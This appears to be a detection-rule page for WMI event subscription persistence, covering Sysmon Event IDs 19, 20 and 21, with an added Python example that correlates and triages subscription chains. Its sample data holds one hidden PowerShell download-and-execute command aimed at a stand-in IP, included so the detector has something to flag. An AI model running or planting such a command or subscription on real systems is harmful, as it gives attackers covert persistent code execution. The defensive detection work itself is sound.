
Summary
This rule detects the creation of WMI (Windows Management Instrumentation) event subscriptions, a persistence method attackers use to keep access to a compromised host. A permanent subscription has three parts: an __EventFilter (a WQL query describing the trigger, such as system start-up or a timer), an event consumer (the action, typically a CommandLineEventConsumer or ActiveScriptEventConsumer that runs a command or script) and a __FilterToConsumerBinding that links the two. Sysmon records each of these three steps, and the rule matches on the corresponding Sysmon event IDs: Event ID 19 (WMI event filter activity), Event ID 20 (WMI event consumer activity) and Event ID 21 (consumer-to-filter binding). Together these events indicate that a mechanism has been established which will run a payload whenever the specified system event occurs. The rule fires on every such creation rather than only on anomalous ones; because legitimate management and monitoring software also registers subscriptions, known-good filters and consumers in the environment should be excluded as tuning, and the remaining hits, especially bindings to command-line or script consumers, should be investigated as likely adversarial persistence.
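The following is an added worked example, not the rule's own implementation or code from the page. It applies the rule (Sysmon Event IDs 19, 20 and 21) to a handful of constructed event records, then goes one step further than the bare rule by correlating filter, consumer and binding into complete subscription chains, ranking chains with command-line or script consumers highest and dropping an allowlist of known-good names. The field names follow Sysmon's WmiEvent schema (Name, Type, Query, Destination, Consumer, Filter, User); the sample events, the allowlist and the exact consumer "Type" strings are assumptions made for the example.

```python
import re

# Sysmon event IDs the rule matches on (as stated on the page).
WMI_EVENT_IDS = {19: "filter", 20: "consumer", 21: "binding"}

# Consumer types that execute arbitrary commands or script, i.e. the ones used
# for persistence. Assumption: Sysmon's Event ID 20 "Type" field spells them
# like this in the constructed events below.
EXEC_CONSUMER_TYPES = {"Command Line", "Script"}

# Constructed sample telemetry in Sysmon WmiEvent field names; not real logs.
# First record is an unrelated event that must not match. The "Updater" chain
# is a typical malicious subscription; the SCM pair is Windows' own built-in
# subscription and the usual tuning exception.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 19, "Operation": "Created", "User": r"CORP\jdoe", "Name": "Updater",
     "Type": "__EventFilter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
              "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": 20, "Operation": "Created", "User": r"CORP\jdoe", "Name": "Updater",
     "Type": "Command Line",
     "Destination": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://192.0.2.10/a')\""},
    {"EventID": 21, "Operation": "Created", "User": r"CORP\jdoe",
     "Consumer": 'CommandLineEventConsumer.Name="Updater"',
     "Filter": '__EventFilter.Name="Updater"'},
    {"EventID": 19, "Operation": "Created", "User": r"NT AUTHORITY\SYSTEM",
     "Name": "SCM Event Log Filter", "Type": "__EventFilter",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Operation": "Created", "User": r"NT AUTHORITY\SYSTEM",
     "Name": "SCM Event Log Consumer", "Type": "NT Event Log", "Destination": ""},
    {"EventID": 21, "Operation": "Created", "User": r"NT AUTHORITY\SYSTEM",
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
]

# Assumed tuning list of vetted filter/consumer names for this environment.
ALLOWLIST = frozenset({"SCM Event Log Filter", "SCM Event Log Consumer"})

# Binding references look like  CommandLineEventConsumer.Name="Updater"
_REF = re.compile(r'^(\w+)\.Name="([^"]+)"$')


def rule_matches(event):
    """The rule as written: any Sysmon WMI subscription activity event."""
    return event.get("EventID") in WMI_EVENT_IDS


def parse_ref(ref):
    """Split a WMI object path into (class, instance name)."""
    m = _REF.match(ref)
    return (m.group(1), m.group(2)) if m else (None, ref)


def correlate(events):
    """Join each Event ID 21 binding to the filter (19) and consumer (20) it names."""
    filters = {e["Name"]: e for e in events if e.get("EventID") == 19}
    consumers = {e["Name"]: e for e in events if e.get("EventID") == 20}
    chains = []
    for e in events:
        if e.get("EventID") != 21:
            continue
        _, fname = parse_ref(e["Filter"])
        ctype, cname = parse_ref(e["Consumer"])
        chains.append({"user": e.get("User"), "filter_name": fname,
                       "consumer_name": cname, "consumer_class": ctype,
                       "filter": filters.get(fname), "consumer": consumers.get(cname)})
    return chains


def triage(events, allowlist=frozenset()):
    """Alert on every complete chain not covered by the allowlist.

    Chains ending in a command-line or script consumer are rated high because
    that is exactly the shape of WMI persistence; everything else is medium
    and still worth a look.
    """
    alerts = []
    for c in correlate(events):
        if c["filter_name"] in allowlist or c["consumer_name"] in allowlist:
            continue
        consumer = c["consumer"] or {}
        severity = "high" if consumer.get("Type") in EXEC_CONSUMER_TYPES else "medium"
        alerts.append({"severity": severity, "user": c["user"],
                       "filter": c["filter_name"], "consumer_class": c["consumer_class"],
                       "trigger": (c["filter"] or {}).get("Query", ""),
                       "payload": consumer.get("Destination", "")})
    return alerts


if __name__ == "__main__":
    print("raw rule hits:", sum(rule_matches(e) for e in SAMPLE_EVENTS))
    for alert in triage(SAMPLE_EVENTS, ALLOWLIST):
        print(alert)
```

Run stand-alone, the bare rule reports six hits (three for each chain), while the triage step reduces that to the single "Updater" chain rated high, with the WQL trigger and the PowerShell payload pulled into the alert so an analyst can act on it without re-querying root\subscription on the host.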
Categories
- Windows
- Endpoint
Data Sources
- WMI (Sysmon WmiEvent, Event IDs 19, 20 and 21)
Created: 2019-01-12